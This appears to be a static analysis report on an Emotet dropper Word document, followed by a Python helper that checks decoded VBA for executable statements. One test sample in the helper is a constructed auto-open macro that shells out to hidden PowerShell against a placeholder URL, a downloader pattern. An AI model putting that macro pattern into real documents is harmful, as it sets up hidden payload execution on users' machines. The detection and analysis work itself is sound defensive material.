Emotet — Office (OLE) / .DOC malware analysis

Static analysis result for SHA-256 bbe0ecfae4eea9b7…

MALICIOUS

Office (OLE) / .DOC

Size: 146.0 KB
Created: 2020-08-19 22:16:00
Authoring application: Microsoft Office Word
MD5: 364f32d43803c1d3815c1efb8df7ea85
SHA-1: 33acabca62460f699e301116010f579192dbcc9b
SHA-256: bbe0ecfae4eea9b798676c8a898b034bfbc63c712e83dbc0338dc793c7490fe9
Risk Score: 68

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1204.002 Malicious File

The file was detected by ClamAV as 'Doc.Dropper.EmotetIOS-9402070-0', a signature associated with the Emotet malware family. The VBA project that olevba extracted contains no executable statements (only attributes, options and comments), so the classification rests on the signature match, not on observed macro behaviour. Emotet documents of this period were macro droppers that fetch and run a second-stage payload, which is what the signature name implies here, so treat the sample as a downloader. Before relying on the empty-source finding, verify it: decoded VBA source that holds only attributes is also what you see when the source stream has been stripped and only the compiled p-code remains (VBA stomping), or when the module of interest was not among the extracted streams. Compare the decompressed source against the p-code (pcodedmp, or olevba --pcode) and inspect the document body and any embedded OLE objects for the stage-two logic.

Heuristics 3

  • ClamAV: Doc.Dropper.EmotetIOS-9402070-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
  • VBA project contains no executable statements low OLE_VBA_MACROS
    Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main
    (This is the DrawingML XML namespace declared by any Office document that carries drawing or image parts: a benign structural string, not a network indicator. It is the only URL extracted, so no download location for the second stage was recovered statically.)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     SHA-256                                                            Kind        Source                                                Size
macros.bas   4f4a8b88fb3d1d9eb3a7ed29a68af2564ed92b1e830633b4ccac03177a7beeca   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   727 bytes
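As an added check (example code written for this note, not part of the analysis platform's tooling), the following Python reproduces the OLE_VBA_MACROS heuristic in a form you can run over decoded VBA source: it joins continuation lines, strips comments without being fooled by apostrophes inside string literals, discards Attribute and Option lines and procedure header/end lines, and reports whatever is left as executable statements. The two module texts are constructed samples (an attribute-only module of the shape the 727-byte macros.bas above has, and a small downloader stub); scan_document assumes oletools is installed and uses its VBA_Parser.extract_macros() API.

```python
"""Does a decoded VBA module contain any executable statement?

Added example, not the report's own tooling. An empty result matches the
report's 'VBA project contains no executable statements' finding.
"""
import re
from typing import Dict, List

# Constructed sample 1: attribute-only module, the shape olevba emits when the
# source has no body (or has been stripped and only p-code remains).
ATTRIBUTE_ONLY_MODULE = '''Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
' nothing here

Rem also nothing
'''

# Constructed sample 2: a module with a real body. The string literal holds an
# apostrophe and the Shell call is split with a continuation, on purpose.
DOWNLOADER_MODULE = '''Attribute VB_Name = "ThisDocument"
Option Explicit

Private Sub Document_Open()
    Dim url As String   ' declaration
    url = "http://example.invalid/it's/payload" ' trailing comment
    Shell "cmd /c " & _
          "powershell -w hidden -c " & url, 0
End Sub
'''

_COMMENT_ONLY = re.compile(r"^\s*(?:'|Rem(?:\s|$))", re.IGNORECASE)

# Lines that declare metadata or delimit procedures; they never execute.
# Dim/Const/Declare are deliberately NOT listed: a bare API Declare in an
# otherwise empty module is itself worth a look.
_DECLARATION = re.compile(r"""^\s*(?:
    Attribute\s+\S+\s*=                                   # Attribute VB_Name = "Module1"
  | Option\s+(?:Explicit|Base|Compare|Private)\b          # compiler options
  | (?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?
      (?:Sub|Function|Property\s+(?:Get|Let|Set))\s+\w+   # procedure header
  | End\s+(?:Sub|Function|Property)\b                     # procedure end
)""", re.IGNORECASE | re.VERBOSE)


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment, ignoring apostrophes inside "..." literals."""
    if _COMMENT_ONLY.match(line):
        return ""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string  # a doubled "" toggles twice, net unchanged
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def logical_lines(source: str) -> List[str]:
    """Join ' _' continuation lines so a split statement is counted once."""
    out, buf = [], ""
    for raw in source.splitlines():
        stripped = strip_comment(raw).rstrip()
        if stripped.endswith(" _"):
            buf += stripped[:-1]
            continue
        out.append(buf + stripped)
        buf = ""
    if buf:
        out.append(buf)
    return out


def executable_statements(source: str) -> List[str]:
    """Logical lines that are neither blank, comment, attribute, option,
    nor procedure header/end. Empty list == 'no executable statements'."""
    return [line.strip() for line in logical_lines(source)
            if line.strip() and not _DECLARATION.match(line)]


def has_executable_statements(source: str) -> bool:
    return bool(executable_statements(source))


def scan_document(path: str) -> Dict[str, List[str]]:
    """Apply the check to every module oletools can extract from a file.
    Assumes oletools is installed (imported lazily so the helpers above
    run without it); keys are the VBA module filenames."""
    from oletools.olevba import VBA_Parser
    vp = VBA_Parser(path)
    results: Dict[str, List[str]] = {}
    if vp.detect_vba_macros():
        for _, _, vba_filename, vba_code in vp.extract_macros():
            results[vba_filename] = executable_statements(vba_code)
    vp.close()
    return results


if __name__ == "__main__":
    for name, src in (("attribute-only", ATTRIBUTE_ONLY_MODULE),
                      ("downloader", DOWNLOADER_MODULE)):
        stmts = executable_statements(src)
        print(f"{name}: {len(stmts)} executable statement(s)")
        for s in stmts:
            print("   ", s)
```

An attribute-only result from scan_document is a prompt to run the p-code comparison, not a verdict that the document is inert: the decompressed source stream is what olevba decodes, and it is exactly the stream an attacker can blank out while leaving the p-code Word will execute.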